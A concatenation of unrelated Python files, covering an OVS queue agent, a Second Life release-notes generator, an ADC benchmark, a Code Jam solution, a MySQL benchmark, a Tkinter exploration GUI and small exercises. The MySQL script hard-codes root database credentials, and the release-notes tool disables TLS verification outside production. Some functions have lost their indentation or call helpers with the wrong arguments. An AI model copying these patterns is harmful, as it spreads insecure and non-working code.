        """Return a {interface_name: ofport_number} map from ovs-vsctl.

        The 'name'/'ofport' columns come back as alternating lines, so a
        flip-flop flag pairs each name with the following port number.
        """
        command = 'ovs-vsctl --columns=name,ofport list Interface'
        (c1, o1) = self.run_system_command(command)
        lines = o1.split('\n')
        flag = 0
        ports = {}
        for line in lines:
            if len(line.split(': ')) > 1:
                if flag == 0:
                    name = line.split(': ')[1].replace('"', '')
                    ports[name] = None
                    flag = 1
                else:
                    port_no = line.split(': ')[1]
                    ports[name] = int(port_no)
                    flag = 0
        #p = dict(zip(ports.values(),ports.keys()))
        return ports

    def create_queue_object(self, q_id, uuid, min_rate, max_rate, priority):
        """Build the plain-dict description of a queue used in responses."""
        return {
            "q_id": q_id,
            "uuid": uuid,
            "min_rate": min_rate,
            "max_rate": max_rate,
            "priority": priority
        }
if __name__ == "__main__":
    # Clear the screen, start the agent thread, then block until a
    # signal arrives (pause() returns on any handled signal).
    cls()
    try:
        host = '0.0.0.0'
        port = 4400
        queue_agent_thread = queue_agent_server(host, port)
        queue_agent_thread.start()
        pause()
    except KeyboardInterrupt:
        # Ask the server loop to stop and wait for it to clean up zmq.
        queue_agent_thread.shutdown_flag.set()
        queue_agent_thread.join()
        print('Exiting')
|
#!/usr/bin/env python
"""
Automatically generate release notes based on DRTVWR tickets
"""
import os, sys
import urllib, urllib2
import yaml, time
from argparse import ArgumentParser
from llbase import llrest
from llbuildutils.codeticket_data import CodeTicketData, CodeTicketDataError
from llbuildutils.sljira import SLJira, SLJiraError
def query_vvm(query, options, body=None, force_staging=False):
    """
    Send a query to the viewer version manager
    Returns the response from the query
    Args:
        query: the path for our request
        options: our series of options that contains our grid and ssl keys
        body: a dict of items that are to be POSTed
        force_staging: Use the staging grid, even if production is set in
            the options
    Returns:
        response: the response to the llrest.RESTService() call
    """
    # The various fields that we need
    cert = (options.ssl_key, options.ssl_cert)
    verify = False
    authenticated = False
    headers = {}
    if options.verbose:
        print "\n\n====== New VVM Query ======"
    response = False
    # default to staging, unless told otherwise
    url = "https://viewer-version-api-client.staging.secondlife.com/manager"
    if not force_staging:
        if options.grid in ['prod', 'production']:
            # Production is the only grid where TLS verification is on.
            url = "https://viewer-version-api.secondlife.com/manager"
            verify = True
        elif options.grid in ['dev', 'development']:
            url = "https://viewer-version-api.dev.secondlife.com/manager"
            verify = False
    if options.verbose:
        print "URL is: %s" % url
        print "Query is: %s" % query
        print "Cert is: %s" % ",".join(cert)
        print "verify is: %s" % verify
        print "headers are: %s" % headers
        print "body is: %s" % body
    # A body means POST; otherwise a plain GET.
    if body:
        connection = llrest.RESTService("vvm query", url, \
            codec=llrest.RESTEncoding.LLSD, authenticated=authenticated)
        # llrest.RESTService() will set
        # the default 'content-type' to be 'application/llsd'
        # when using the RESTEncoding.LLSD codec
        # But the VVM won't accept this, and we'll get a 400 error back
        # so, force it to 'application/xml+llsd' instead,
        # which the VVM _can_ parse
        # Interestingly, 'application/x-www-form-urlencoded' will
        # also work as a content type
        # No, I don't know why either
        headers['Content-Type'] = 'application/xml+llsd'
        response = connection.post(path=query, data=body, cert=cert, \
            headers=headers, verify=verify)
        if options.verbose:
            print "Response to POST was:"
            print response
    else:
        connection = llrest.RESTService("vvm query", url, \
            authenticated=authenticated)
        response = connection.get(query, cert=cert, headers=headers, \
            verify=verify)
        if options.verbose:
            print "Response to GET was:"
            print response
    return response
def get_jira_content(jira_number):
    """
    Extract the data from a given field from a specific jira ticket
    Args:
        jira_number: the jira number to query
    Returns:
        jira_content: the result of the SLJira.get_issue() call,
            plus the extra bits we asked for, with custom-field keys
            renamed to their human-readable names
    """
    jira = SLJira()
    # Additional fields we also want:
    # customfield_11071 is 'cohort desired'
    # A map for the additional fields
    # 'Cohort Desired' and 'Viewer Cohort' are for the Viewer
    # 'Project' is used so we can get the project key (e.g. DRTVWR/DRTSIM, etc)
    # 'Build Id' is for the simulator.
    includes = {'Cohort Desired': 'customfield_11071', \
                'Viewer Cohort': 'customfield_11070',\
                'Release Notes': 'customfield_10110',\
                'Project': 'project',
                'Build Id': 'customfield_11091'}
    # the custom fields we actually want to retrieve
    include = []
    for k, v in includes.iteritems():
        include.append(v)
    jira_content = jira.get_issue(jira_number, include)
    # Re-key the response: customfield_xxxxx -> readable name.
    for k, v in includes.iteritems():
        try:
            jira_content[k] = jira_content[v]
        except KeyError:
            #Likely because the item we were looking for wasn't in the jira
            # And there's no default value
            #jira_content[k] = None
            pass
        try:
            # clean up the dict afterwards
            del jira_content[v]
            # for some reason, this happens with the viewer cohort field
            # We don't get it from get_issue(), but we do get it if
            # we request it
            # No, I don't understand either
        except KeyError:
            pass
    return jira_content
def get_info_from_jira(jira_number):
    """
    Retrieve the build number from the JIRA

    Returns (project_key, build_number, cohort_name, release_notes).
    build_number stays None for projects other than DRTVWR/DRTSIM.
    """
    build_number = None
    jira_content = get_jira_content(jira_number)
    project = jira_content['Project']['key']
    if project == "DRTVWR":
        # in DRTVWRs, the 'Build Link' is the link to the build we want to ship
        # NOTE(review): 'Build Link' is not in the extra-fields map in
        # get_jira_content() -- confirm it is always present in the response.
        build_link = jira_content['Build Link']
        # A build link looks something like this:
        # https://codeticket.secondlife.io/version/518143#
        # or like
        # https://codeticket.secondlife.io/version/514491
        # Have to grab the six digit build number in either case
        # Split the string up by the '/', and grab the entry at the very end
        # Then grab the first six characters of that string [0:6]
        build_number = build_link.split('/')[-1][0:6]
    elif project == "DRTSIM":
        # For DRTSIMs, we want the 'Build Id' field
        # They usually looks like this:
        # 2018-09-04T22:24:22.519323
        # This field is the id of the image we're going to deploy
        # which is not the version of the code that users will be seeing
        # Therefore, extract the six digit build id and use codeticket
        # to turn this into the build id of the version we're actually deploying
        image_id = jira_content['Build Id']
        build_id = image_id.split('.')[-1]
        build_number = build_id
    try:
        cohort_name = jira_content['Viewer Cohort'].capitalize()
    except KeyError:
        # A KeyError typically means we weren't able to find a cohort
        cohort_name = ""
    # Fall back to the literal string "None" when the field is empty.
    release_notes = "None" if not jira_content['Release Notes'] \
        else jira_content['Release Notes']
    # print jira_content
    #import pprint
    #pprint.pprint(jira_content)
    #print "project: %s" % project
    #print "build number: %s" % build_number
    #print "cohort_name: %s" % cohort_name
    #print "release notes:"
    #print release_notes
    return project, build_number, cohort_name, release_notes
def write_output(release_meta, release_notes, filename):
    """
    Write the release notes out to our file

    The file gets a YAML front-matter block (release_meta) delimited by
    '---' lines, followed by the UTF-8 encoded release-notes body.
    """
    with open(filename, 'w+') as outfile:
        yaml.safe_dump(release_meta, outfile, explicit_start=True,
                       allow_unicode=True, default_flow_style=False,
                       width=4096)
        outfile.write("---\n")
        outfile.write(release_notes.encode('utf8'))
        outfile.write("\n")
def get_options():
    """
    Get the options from the user

    Parses the command line; the SSL key/cert may come either from the
    --sslkey/--sslcert options or from the $SSL_KEY/$SSL_CERT
    environment variables.  Exits with status 1 when neither is given.
    """
    parser = ArgumentParser(description='Automatically generate release notes ')
    parser.add_argument("-U", "--url", dest="url", \
        help="The URL to the jira instance", default="jira.secondlife.com")
    parser.add_argument("-a", "--api", dest="api", \
        help="The version of the api", default="latest")
    parser.add_argument("-v", "--verbose", dest="verbose", help="Be chatty", \
        default=False, action="store_true")
    parser.add_argument("-j", "--jira", dest="jira", \
        help="The JIRA to generate release notes from", required=True)
    parser.add_argument("-g", "--grid", dest="grid", help="The grid to query", \
        default="staging")
    parser.add_argument("-b", "--build", dest="build_number", \
        help="Use a build number different than the one specified in the JIRA.")
    parser.add_argument("--sslkey", dest="ssl_key", \
        help="The location of the client ssl key")
    parser.add_argument("--sslcert", dest="ssl_cert", \
        help="The location of the client ssl cert")
    options = parser.parse_args()
    # jira should be in upper case
    # the API will fail if it isn't
    #options.jira = options.jira.upper()
    # Fall back to environment variables for the client credentials.
    if options.ssl_key is None or options.ssl_cert is None:
        try:
            options.ssl_key = os.environ['SSL_KEY']
            options.ssl_cert = os.environ['SSL_CERT']
        except KeyError:
            print "Client cert and key are required"
            print "Either specify them as an option"
            print "or in the $SSL_KEY and $SSL_CERT environment variables"
            sys.exit(1)
    return options
def get_viewer_version_from_build(build_number):
    """
    Get the version number from a build

    Returns a (channel, version) tuple looked up through CodeTicket.
    Re-raises CodeTicketDataError after printing a hint about the
    $CODETICKET_SERVICE environment variable.
    """
    version = None
    try:
        ct = CodeTicketData()
        ct_data = ct.get(build_number)
        # get_viewer_channel_version() returns (channel, version).
        channel = ct_data.get_viewer_channel_version()[0]
        version = ct_data.get_viewer_channel_version()[1]
    except CodeTicketDataError:
        print "Unable to contact CodeTicket to get information for build %s" % build_number
        print "Is the environment variable $CODETICKET_SERVICE set to 'https://codeticket-ext.secondlife.io'?"
        raise
    return channel, version
def version_manager(options):
    """
    Retrieve and process information from the Viewer Version Manager

    Builds the metadata dict for the release notes: title, channel,
    release type (release/beta/project), cohort, and the validated
    installer download URLs for this version.
    """
    meta = {}
    meta['installers'] = []
    meta['title'] = options.version
    # New VVM:
    # Is this beta, release or project?
    try:
        viewer_info = query_vvm('cohort/?version=%s' % options.version, options)[0]
        meta['channel'] = viewer_info['channel_name']
    except IndexError:
        print "Unable to retrieve viewer info from Viewer Version Manager"
        print "Has this build been added?"
        sys.exit(1)
    #print options.channelName
    # Classify the channel into release / beta / project.
    if "Second Life Release" in meta['channel']:
        meta['release_type'] = 'release'
        meta['cohort'] = viewer_info['name']
    elif "Second Life Beta" in meta['channel']:
        meta['release_type'] = 'beta'
        meta['cohort'] = viewer_info['channel_name'].replace("Second Life ", "")
    else:
        meta['release_type'] = 'project'
        meta['cohort'] = viewer_info['channel_name'].replace("Second Life ", "")
    # get the download URLS for this release
    viewer_urls = query_vvm('cohort/builds/?channel_name=%s&name=%s' % \
        (urllib.quote(meta['channel']), \
        urllib.quote(viewer_info['name'])), options)
    # Keep only installers for this exact version whose URL responds.
    for viewer_url in viewer_urls['builds']:
        if viewer_url['version'] == options.version:
            for platform in viewer_url['platforms']:
                if validate_download_url(platform['url']):
                    meta['installers'].append(platform)
                else:
                    if options.verbose:
                        print "Unable to verify download location '%s' for platform '%s'" % (platform['url'], platform)
    #print "metadata is"
    #pprint(meta)
    return meta
def generate_fixed_issues(options):
    """
    generate our list of fixed JIRAs, their URLs and summaries

    Returns a list of {'jira', 'text', 'url'} dicts for every resolved
    issue linked to options.jira, substituting the public BUG ticket
    for an internal one whenever a linked BUG exists.
    """
    fixed_issues = []
    #if options.verbose == True:
    #    print 'Retrieving linked JIRAs from %s' % (jira_url)
    jira = SLJira()
    jiras = jira.get_links(options.jira)
    if options.verbose == True:
        print "Linked to %s are:" % options.jira
        for linked_jira in jiras:
            print "%s: %s" % (linked_jira['key'], linked_jira['summary'])
    for final_jira in jiras:
        #print final_jira
        # JIRAs that are 'open' or 'in progress' should not be included in the list
        # and Omit IQAs, DRTVWR, SEC and WOLF jiras:
        if final_jira['status'] in \
            ['Pending Release', 'Closed', 'Verified', 'Resolved'] and \
            final_jira['issuetype'] not in ['QART', 'DRT', 'SEC', 'WOLF']:
            jira_key = final_jira['key']
            jira_summary = final_jira['summary']
            jira_url = final_jira['url']
            # Check the jira, to see if there's a BUG attached to it
            # if so, use that BUG instead
            # External users won't be able to see MAINT jiras, only BUGs
            for linked_jira in jira.get_links(final_jira['key']):
                # We want the 'project' that that a particular JIRA is in
                # so we can figure out which ones are in the BUG project
                if jira.get_issue(linked_jira['key'], \
                    ['project'])['project']['key'] == "BUG":
                    jira_key = linked_jira['key']
                    jira_summary = linked_jira['summary']
                    jira_url = linked_jira['url']
                    if options.verbose:
                        print "Switching to use public %s instead of internal %s" % \
                            (linked_jira['key'], final_jira['key'])
                    break
            fixed_issues.append({'jira': jira_key, \
                'text': jira_summary, 'url': jira_url})
    # fixed issues are now in the 'fixed_issues' list
    return fixed_issues
def validate_download_url(url):
"""
check each download location
to make sure it's available
"""
try:
urllib2.urlopen(url).code
except urllib2.URLError, e:
# If we're here, then we had an error when accessing the file
# Check the code returned from urlopen(), anything in the 400 range
# means we can't access the file
# so we shouldn't be presenting it to the user
if e.code / 100 >= 4:
return False
return True
def generate_viewer_release_notes(options):
    """
    Generate viewer release notes

    Looks up the channel/version for the build, gathers metadata from
    the Viewer Version Manager and the linked JIRAs, and writes the
    markdown file under content/viewer/.
    """
    options.channel, options.version = \
        get_viewer_version_from_build(options.build_number)
    #version = options.version.split('.')
    # Talk to version manager, and get a bunch of information from there that
    # we'll need later on
    release_meta = version_manager(options)
    release_meta['date'] = int(time.time())
    release_meta['menu'] = "viewer"
    release_meta['resolved_issues'] = generate_fixed_issues(options)
    # Get the notes for this release
    # The new static release notes look a little different
    # than the previous wiki-fied ones
    # The file looks like:
    #
    # ---
    # title: <VERSION_NUMBER>
    # date: <Epoch time>
    # cohort: <COHORT_NAME>
    # menu: "viewer"
    # installers:
    # - platform: <Human-readable platform name>
    #   url: <URL to installer>
    #   icon: <What icon to use>
    # resolved_issues:
    # - jira: <JIRA ticket number of our resolved issue>
    #   text: <Summary text of our JIRA
    #   url: <URL to jira ticket>
    # ---
    # <Contents of the 'Release Notes' field in markdown>
    #
    #
    filename = "content/viewer/%s.md" % options.version
    # Write the release notes out to a file
    write_output(release_meta, options.release_notes, filename)
    return True
def generate_simulator_release_notes(options):
"""
Generate release notes for the simulator
"""
# Does nothing for right now
print options
filename = "content/server/%s.md" % options.version
write_output(options.release_notes, filename)
return True
def main():
    """
    Our main program

    Reads options, pulls build/cohort/notes data from the JIRA, then
    dispatches to the viewer or simulator note generator based on the
    JIRA's project key.
    """
    options = get_options()
    project, build_number, options.cohortName, options.release_notes = \
        get_info_from_jira(options.jira)
    #print project
    #print build_number
    # The JIRA's build number is only a default; -b on the command line
    # overrides it.
    if not options.build_number:
        options.build_number = build_number
    if project == "DRTVWR":
        generate_viewer_release_notes(options)
    elif project == "DRTSIM":
        generate_simulator_release_notes(options)
if __name__ == '__main__':
    # Exit quietly (status 1) on Ctrl-C instead of printing a traceback.
    try:
        main()
    except KeyboardInterrupt:
        sys.exit(1)
#!/usr/bin/python
#--------------------------------------
#
# Raspberry Pi HAT 8 Channel ADC V 1.1 - MCP3208 - SPI
#
# Microchip MCP3208 chip
#
# Author : V. R. Iglesias
# Date : 04/06/2017
#
# http://www.nationelectronics.com/
#
#
# Type the following to run the script:
#
# sudo python speedtest.py
#
#--------------------------------------
import os
import spidev
import time
# Function to convert digital data to Volts
def Volts(data, places, Vref):
    """Convert a raw 12-bit ADC reading (0-4095) to volts, rounded to `places`."""
    escala = Vref / 4096.0
    return round(data * escala, places)
# Function to read Digital Data from a MCP3208 channel
# Channel 0-7
def ReadADCChannel(channel):
    """Read one 12-bit sample from MCP3208 channel 0-7 over the global SPI bus."""
    # Single-ended command word: start bit + single/diff bit + 3 channel bits.
    comando = [6 + ((channel & 4) >> 2), (channel & 3) << 6, 0]
    resposta = spi.xfer2(comando)
    # 12-bit result: low nibble of byte 1 is the high part, byte 2 the low byte.
    return ((resposta[1] & 15) << 8) + resposta[2]
# Reference Voltage, Jumper selected 5.0 (default), 3.3, 1.0, or 0.3 Volts
Vref = 5.0
# (jumper CE0 on) chip = 0 (default), (jumper CE1 on) chip = 1
chip = 0
# Open SPI bus
spi = spidev.SpiDev()
spi.open(0, chip)
# set the maximum SPI clock speed (Hz)
spi.max_speed_hz = 200000
#print("Max speed Hz : {}".format(spi.max_speed_hz))
# Benchmark: time `num` reads of channel 0 and report the sample rate.
start_time = time.time()
i = 0
num = 500000
while i < num:
    i = i + 1
    c0 = ReadADCChannel(0)
thetime = time.time() - start_time
# ksps = kilo-samples per second
print ("\n--- %s samples" % (num))
print ("\n--- %s seconds" % (thetime))
print ("\n--- %s ksps\n\n" % ( num / thetime / 1000))
|
# Copyright (c) 2021 kamyu. All rights reserved.
#
# Google Code Jam 2021 Round 1B - Problem C. Digit Blocks
# https://codingcompetitions.withgoogle.com/codejam/round/0000000000435baf/00000000007ae37b
#
# Time: precompute: O(N^3 * B * D)
# runtime: O(N * B)
# Space: O(N^3 * B * D)
#
# Usage: python interactive_runner.py python3 testing_tool.py 1 -- python digit_blocks.py
#
# Expected score compared to the max expected score = 19086952424670896.00/19131995794056374.42 = 99.76%
#
from sys import stdout
def read():
    # Python 2 input() evaluates the line, so judge digits arrive as ints.
    return input()
def write(i):
    # Emit one response line and flush so the interactive judge sees it.
    print i
    stdout.flush()
def digit_blocks():
    # Play one test case: N towers of B digit blocks each, placing every
    # received digit on the tower chosen by the precomputed DP table.
    grow_h = 0
    # lookup[h] holds the 0-based indices of towers with current height h.
    lookup = [[] for _ in xrange(B+1)]
    lookup[0] = range(N)
    for _ in xrange(N*B):
        d = read()
        # State key: (#full towers, #towers at B-1, #towers at B-2, growing height).
        h = choice[len(lookup[B])][len(lookup[B-1])][len(lookup[B-2])][grow_h][d]
        if h < B-2:
            # Placed on the "growing" tower: advance its height cyclically.
            grow_h = (grow_h+1)%(B-2)
        # Move the chosen tower from height h to height h+1 and answer 1-based.
        lookup[h+1].append(lookup[h].pop())
        write(lookup[h+1][-1]+1)
D = 10
T, N, B, P = map(int, raw_input().strip().split())
# Powers of ten: P[i] is the positional value of a digit at height i.
P = [1]
while len(P) < B:
    P.append(P[-1]*D)
# dp[a][b][c][g]: expected remaining score with a towers at B-1, b at B-2,
# c lower towers, and growing height g.  choice[...][d] is the best height
# to place digit d in that state.
dp = [[[[0.0 for _ in xrange(B-2)] for _ in xrange(N+1)] for _ in xrange(N+1)] for _ in xrange(N+1)]
choice = [[[[[None for _ in xrange(D)] for _ in xrange(B-2)] for _ in xrange(N+1)] for _ in xrange(N+1)] for _ in xrange(N+1)]
for remain0_cnt in reversed(xrange(N)):
    for remain1_cnt in reversed(xrange(N-remain0_cnt+1)):
        for remain2_cnt in reversed(xrange(N-remain0_cnt-remain1_cnt+1)):
            for grow_h in reversed(xrange(1 if remain0_cnt+remain1_cnt+remain2_cnt == N else B-2)):
                for d in xrange(D):
                    # Evaluate the three possible placements and keep the best.
                    max_ev = float("-inf")
                    if remain1_cnt:
                        # Finish a tower at height B-1 (top digit).
                        ev = dp[remain0_cnt+1][remain1_cnt-1][remain2_cnt][grow_h] + P[B-1]*d
                        if ev > max_ev:
                            max_ev = ev
                            choice[remain0_cnt][remain1_cnt][remain2_cnt][grow_h][d] = B-1
                    if remain2_cnt:
                        # Raise a tower from height B-2 to B-1.
                        ev = dp[remain0_cnt][remain1_cnt+1][remain2_cnt-1][grow_h] + P[B-2]*d
                        if ev > max_ev:
                            max_ev = ev
                            choice[remain0_cnt][remain1_cnt][remain2_cnt][grow_h][d] = B-2
                    if remain0_cnt+remain1_cnt+remain2_cnt != N:
                        # Place on the growing low tower.
                        ev = dp[remain0_cnt][remain1_cnt][remain2_cnt+(grow_h+1)//(B-2)][(grow_h+1)%(B-2)] + P[grow_h]*d
                        if ev > max_ev:
                            max_ev = ev
                            choice[remain0_cnt][remain1_cnt][remain2_cnt][grow_h][d] = grow_h
                    # Each digit is uniformly random: average over D.
                    dp[remain0_cnt][remain1_cnt][remain2_cnt][grow_h] += max_ev/D
# Sanity check: expected score must reach 99.76% of the theoretical max.
S = 19131995794056374.42
assert(dp[0][0][0][0]/S >= 0.9976)
for case in xrange(T):
    digit_blocks()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Oct 19 10:03:15 2017
@author: dgratz
"""
import PyLongQt as pylqt
# Load the saved 7x7 no-connection grid protocol as a template.
settings = pylqt.Misc.SettingsIO.getInstance()
proto = pylqt.Protocols.GridProtocol()
settings.readSettings(proto,'D:/synchrony-data/ela7x7NoConn.xml')
lastProto = settings.lastProto.clone()
# Set the same conductance constant on all four sides of every grid node.
for row in lastProto.grid:
    for node in row:
        for side in range(4):
            node.setCondConst(0.05,pylqt.Side(side),False,0.0016)
# Run two simulations from the template, each into its own output folder.
for val in range(2):
    proto = lastProto.clone()
    proto.pvars.calcIonChanParams()
    proto.setDataDir('D:/synchrony-data/ManyParamsConn0026/'+str(val))
    print(val)
    proto.runSim()
    # Save the settings actually used next to the simulation output.
    settings.writeSettings(proto,proto.datadir+'/'+proto.simvarfile)
|
"""
single thread, single connection
"""
import mysql.connector
# Module-level connection shared by every call in this script
# (single thread, single connection -- see the module docstring).
# NOTE(review): credentials are hard-coded; move them to config or
# environment variables before real use.
user_db = mysql.connector.connect(
    host="localhost",
    user="root",
    passwd="123456",
    database="users"
)
# One shared cursor reused by read_user_from_db().
user_cursor = user_db.cursor()
def read_user_from_db():
    """
    read user info from db

    Fetches every row of the userinfo table through the shared
    module-level cursor.
    """
    consulta = "select * from userinfo"
    user_cursor.execute(consulta)
    return user_cursor.fetchall()
if __name__ == "__main__":
    # Benchmark: hammer the database with 1000 sequential reads.
    # Bug fix: xrange does not exist in Python 3 (NameError); range
    # behaves identically here and also works on Python 2.
    for _ in range(1000):
        read_user_from_db()
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
"""
题目:利用递归函数调用方式,将所输入的5个字符,以相反顺序打印出来。
"""
def output(ss, ll):
    # Recursively print the characters of ss from position ll-1 down to 0,
    # one per line, i.e. the string in reverse order.
    if ll == 0:
        return
    print ss[ll - 1]
    output(ss, ll - 1)
# Read a string, echo its length and value, then print it reversed
# one character per line.
s = raw_input('Input a string:')
ls = len(s)
print ls, s
output(s, ls)
|
# JTSK-350112
# test_rational.py
# Taiyr Begeyev
# t.begeyev@jacobs-university.de
"""
a test program called that uses the class and
its methods to compute 1/2 + 1/8.
Print the result on the screen.
"""
from rational import Rational
# create two instances
r1 = Rational(1, 2)
r2 = Rational(1, 8)
# find the sum and print it (1/2 + 1/8 = 5/8)
print(r1 + r2)
|
import autodisc as ad
from autodisc.gui.gui import BaseFrame
try:
import tkinter as tk
except:
import Tkinter as tk
from tkinter import ttk
import importlib
import warnings
class ExplorationGUI(BaseFrame):
# TODO: ther seems to be a memory leak, altough a limit for the max_num_of_obs_in_memory is defined, the memory still inreases if more than that are observed
@staticmethod
def default_gui_config():
default_gui_config = ad.gui.BaseFrame.default_gui_config()
default_gui_config.dialog.title = 'Exploration Viewer'
default_gui_config.is_get_obs_from_files = True
default_gui_config.is_get_obs_by_experiment = True
default_gui_config.experiment_num_of_steps = 100
# default_gui_config.max_num_of_obs_in_memory = None
default_gui_config.statistic_columns = []
default_gui_config.detail_views = []
return default_gui_config
    def __init__(self, master=None, explorer=None, datahandler=None, gui_config=None, **kwargs):
        '''
        Takes either an Explorer or a ExplorationDataHandler as input.
        Not both!
        gui_config:
            statistic_columns:
                list
                    ['stat_idx']: Index of the statistic in the list of data.stats. Default = 0
                    ['stat_name']: Name of the statistic as under data.stats[stat_idx]['<stat_name>'].
                    ['disp_name']: Name of the stat displayed in the GUI. Default: <stat_name>
            detail_views:
                list
                    ['type']: Either 'observations' or 'statistics'
                    ['gui']: name of gui that should be used, e.g. ExplorationExperimentGUI
                    ['gui_config']: Configuration of th gui. Default = []
                    ['disp_name']: Name used for the title of the window. Default:<gui>
        '''
        super().__init__(master=master, gui_config=gui_config, **kwargs)
        # Exactly one data source is allowed.
        if explorer is not None and datahandler is not None:
            raise ValueError('Input can only be an Explorer or a DataHandler and not both!')
        if explorer is not None:
            self.explorer = explorer
            self.data = self.explorer.data
        if datahandler is not None:
            self.explorer = None
            self.data = datahandler
        # One (lazily created) detail window slot per configured view.
        num_of_detail_guis = len(self.gui_config.detail_views)
        self.exp_detail_guis = [None] * num_of_detail_guis
        # self.obs_ids_queue = None # holds ids of the results for which the observations are stored
        # self.reset_obs_in_memory()
        self.create_gui()
        self.display_data()
        # Pre-select and open the first run, if any data exists.
        if len(self.data) > 0:
            self.selected_run_id = list(self.data.runs.keys())[0]
            self.open_experiment_details(self.selected_run_id)
            self.tree.focus(self.selected_run_id)
    def create_gui(self):
        """Build the treeview plus its two scrollbars and wire them together."""
        # make the treeview in the frame resizable
        self.columnconfigure(0, weight=1)
        self.rowconfigure(0, weight=1)
        self.tree = ttk.Treeview(self,
                                 selectmode='browse')
        self.tree.grid(column=0, row=0, sticky=tk.NSEW)
        self.tree.bind('<<TreeviewSelect>>', self.on_treeview_select)
        self.scrollbar_y = tk.Scrollbar(self, orient=tk.VERTICAL, command=self.tree.yview)
        self.scrollbar_y.grid(column=1, row=0, sticky=tk.NS)
        self.scrollbar_x = tk.Scrollbar(self, orient=tk.HORIZONTAL, command=self.tree.xview)
        self.scrollbar_x.grid(column=0, row=1, sticky=tk.EW)
        # Keep the scrollbars in sync with the tree's visible region.
        self.tree.config(yscrollcommand=self.scrollbar_y.set)
        self.tree.config(xscrollcommand=self.scrollbar_x.set)
def on_treeview_select(self, event):
run_id = int(self.tree.focus())
# show the experiment data in the property windows
if run_id != self.selected_run_id:
self.selected_run_id = run_id
self.update_experiment_detail_guis(self.selected_run_id)
def load_run_observations(self, run_id):
    """Ensure the observations of run `run_id` are loaded in memory.

    If the stored run has no observations and an Explorer is available,
    the run is re-executed with its saved parameters to regenerate them;
    the result is cached on the run record for immediate reuse.
    """
    obs = self.data[run_id].observations
    if obs is None and self.explorer is not None:
        # re-run the experiment to reproduce the missing observations
        [obs, statistics] = self.explorer.system.run(run_parameters=self.data[run_id].run_parameters,
                                                     stop_conditions=self.gui_config.experiment_num_of_steps)
        # save observations to immediate reuse it
        self.data.runs[run_id].observations = obs

    # # search if new obs is in memory queue
    # if self.obs_ids_queue:
    #
    #     if run_id in self.obs_ids_queue:
    #         # move the experiment_id to the top of the queue
    #         idx = self.obs_ids_queue.index(run_id)
    #         del(self.obs_ids_queue[idx])
    #     else:
    #         # remove last item and add new one
    #         if self.obs_ids_queue[-1]:  # could be none
    #             del self.data[self.obs_ids_queue[-1]]['observations']
    #             self.obs_ids_queue.pop(-1)
    #
    #     self.obs_ids_queue.insert(0, run_id)
# def reset_obs_in_memory(self):
# '''Sets the number of observations in the memory arcording to gui_config['max_num_of_obs_in_memory'].'''
#
# if self.gui_config.max_num_of_obs_in_memory is None:
# # do nothing and store all obs
# self.obs_ids_queue = None
#
# else:
#
# self.obs_ids_queue = [None] * self.gui_config.max_num_of_obs_in_memory
#
# if self.obs_ids_queue is None:
# # initialization --> have to check if the given experiment has too many observations, if so, remove them
#
# idx = 0
#
# for run_id, run_data in self.data.runs.items():
#
# if idx < self.gui_config.max_num_of_obs_in_memory and 'observations' in run_data and run_data.observations is not None:
# self.obs_ids_queue[idx] = run_id
# idx = idx + 1
# else:
# run_data['observations'] = None
#
# else:
# if len(self.obs_ids_queue) > self.gui_config.max_num_of_obs_in_memory:
#
# # queue has to be shortened --> erase the connected observations
# for idx in range(self.gui_config.max_num_of_obs_in_memory, len(self.obs_ids_queue)):
# self.data.runs[self.obs_ids_queue[idx]]['observations'] = None
#
# del(self.obs_ids_queue[(self.gui_config.max_num_of_obs_in_memory):len(self.obs_ids_queue)])
#
# elif len(self.obs_ids_queue) < self.gui_config.max_num_of_obs_in_memory:
#
# # queue has to be extended
# self.obs_ids_queue.extend([None] * self.gui_config.max_num_of_obs_in_memory-len(self.obs_ids_queue))
def open_experiment_details(self, run_id):
    """Open every not-yet-open detail window and show data of `run_id`."""
    # make sure observations exist before any view tries to render them
    self.load_run_observations(run_id)
    for detail_idx, detail_gui in enumerate(self.exp_detail_guis):
        if not detail_gui:
            self.open_experiment_detail_window(detail_idx, run_id)
    self.update_experiment_detail_guis(run_id)
def open_experiment_detail_window(self, detail_gui_idx, run_id):
    """Create (or re-create) detail window `detail_gui_idx` and show run `run_id`."""
    detail_config = self.gui_config.detail_views[detail_gui_idx]

    # destroy a previously opened window occupying this slot, if any
    existing = self.exp_detail_guis[detail_gui_idx]
    if existing:
        existing.master.destroy()

    # resolve the gui class from its dotted path, e.g. 'pkg.mod.ClassName'
    dotted_path = detail_config['gui']
    module_path, _, class_name = dotted_path.rpartition('.')
    gui_class = getattr(importlib.import_module(module_path), class_name)

    new_gui = gui_class(master=self,
                        is_dialog=True,
                        gui_config=detail_config.get('gui_config', []))
    self.exp_detail_guis[detail_gui_idx] = new_gui
    new_gui.display_exploration_data(self.data, run_id)
def update_experiment_detail_guis(self, run_id):
    """Push the data of run `run_id` into every currently open detail window."""
    self.load_run_observations(run_id)
    for detail_gui in self.exp_detail_guis:
        if detail_gui:
            detail_gui.display_exploration_data(self.data, run_id)
def display_data(self):
    """(Re)populate the treeview: one row per run, one column per statistic.

    Column titles and value formatting come from
    `self.gui_config.statistic_columns` ('disp_name' and 'format' keys).
    """
    # remove existing data in treeview
    self.tree.delete(*self.tree.get_children())

    if len(self.data) > 0:
        # add columns for the statistics that should be displayed
        stat_names = []
        col_names = []
        format_strs = []
        for statistic_column in self.gui_config.statistic_columns:
            stat_name = statistic_column['stat_name']
            stat_names.append(stat_name)
            # column title defaults to the raw statistic name
            name = statistic_column.get('disp_name', stat_name)
            col_names.append(name)
            format_str = statistic_column.get('format', None)
            format_strs.append(format_str)
        if col_names:
            self.tree['columns'] = tuple(range(len(col_names)))
            for col_idx in range(len(col_names)):
                self.tree.heading(col_idx, text=col_names[col_idx])

        # go through data
        for run_data in self.data:
            # collect the formatted statistic values for this run
            stat_values = []
            for col_idx in range(len(stat_names)):
                val = run_data.statistics[stat_names[col_idx]]
                if format_strs[col_idx]:
                    val_str = format_strs[col_idx].format(val)
                else:
                    val_str = str(val)
                stat_values.append(val_str)

            # show the name of the parameter set if it has one, otherwise its id
            if 'name' in run_data:
                text = '({}) {}'.format(run_data.id, run_data.name)
            else:
                text = str(run_data.id)

            self.tree.insert('', 'end', run_data.id, text=text, values=stat_values)
def run(self):
    """Start the Tk main event loop (blocks until the window is closed)."""
    self.master.mainloop()
# import the libs requises
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import logging
from kalliope.core.NeuronModule import NeuronModule
# configuration
# logging: install a default handler and reuse kalliope's shared logger
